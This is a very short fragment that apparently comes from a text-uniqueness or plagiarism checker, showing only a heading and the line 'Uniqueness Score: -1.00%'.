                                      Uniqueness

                                      Uniqueness Score: -1.00%